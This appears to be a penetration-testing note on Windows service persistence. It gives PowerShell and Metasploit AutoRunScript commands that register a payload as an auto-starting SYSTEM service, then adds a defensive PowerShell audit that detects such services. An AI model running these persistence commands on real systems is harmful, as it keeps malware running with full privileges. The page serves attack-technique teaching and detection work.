This requires an elevated shell.
Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions. Windows service configuration information, including the file path to the service’s executable or recovery programs/commands, is stored in the Windows Registry.
Services may be created with administrator privileges but are executed under SYSTEM privileges.
Setup
Services can be created from the command prompt if the account has local administrator privileges. The “binpath” parameter specifies the arbitrary payload to execute, and “auto” ensures that the rogue service starts automatically.
Via PowerShell
New-Service -Name "joker" -BinaryPathName "C:\Users\talion\AppData\Roaming\jkr.exe" -Description "Persistent malware" -StartupType Automatic
Start-Service joker
Note that the shell sometimes dies pretty quickly. You can still use the AutoRunScript option from multi/handler;
see https://subscription.packtpub.com/book/networking-and-servers/9781786463166/9/ch09lvl1sec62/using-autorunscript-in-metasploit
Remember to reactivate the ExitOnSession option if you use this technique, otherwise you will create new sessions indefinitely.
$> cat autorun.rc
execute -Htzf "C:\Users\talion\AppData\Roaming\jkr.exe"
$> fg
msf> set AutoRunScript autorun.rc
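A defender-side check for the kind of service created above, as an added example that is not part of the original page: it flags auto-start services whose executable sits in a user-writable directory. The function names, path patterns and sample records are assumptions constructed for illustration.

```powershell
# Added example: audit auto-start services that run from user-writable paths.
# Regex fragments for suspicious locations (assumed list; tune per environment).
$UserWritable = '\\Users\\', '\\AppData\\', '\\Temp\\'

function Get-ServiceExecutable {
    param([string]$PathName)
    # Quoted path: take the text between the first pair of quotes.
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    # Unquoted path with arguments: keep everything up to the first ".exe".
    if ($PathName -match '^\s*(.+?\.exe)\b') { return $Matches[1] }
    return $PathName.Trim()
}

function Test-SuspiciousService {
    param($Service)
    $exe = Get-ServiceExecutable $Service.PathName
    $inUserDir = [bool]($UserWritable | Where-Object { $exe -match $_ })
    # Persistence needs both: automatic start and a path an attacker can write to.
    return ($Service.StartMode -eq 'Auto' -and $inUserDir)
}

# Constructed sample records shaped like Win32_Service objects.
$samples = @(
    [pscustomobject]@{ Name = 'joker';   StartMode = 'Auto';   StartName = 'LocalSystem'
                       PathName = 'C:\Users\talion\AppData\Roaming\jkr.exe' }
    [pscustomobject]@{ Name = 'Spooler'; StartMode = 'Auto';   StartName = 'LocalSystem'
                       PathName = 'C:\Windows\System32\spoolsv.exe' }
    [pscustomobject]@{ Name = 'Schedule'; StartMode = 'Auto';  StartName = 'LocalSystem'
                       PathName = 'C:\Windows\system32\svchost.exe -k netsvcs -p' }
    [pscustomobject]@{ Name = 'updater'; StartMode = 'Manual'; StartName = 'LocalSystem'
                       PathName = '"C:\Users\Public\tools\upd.exe" --service' }
)

# Only 'joker' is both auto-start and located under a user profile.
$samples | Where-Object { Test-SuspiciousService $_ } |
    Select-Object Name, StartName, PathName

# On a live host, feed real data through the same filter:
# Get-CimInstance Win32_Service | Where-Object { Test-SuspiciousService $_ } |
#     Select-Object Name, StartName, PathName
#
# Service installs are also logged by the Service Control Manager (event ID 7045):
# Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045 } |
#     Select-Object TimeCreated, Message
```

Hits need triage rather than automatic removal, since some legitimate software installs services outside the Windows and Program Files directories.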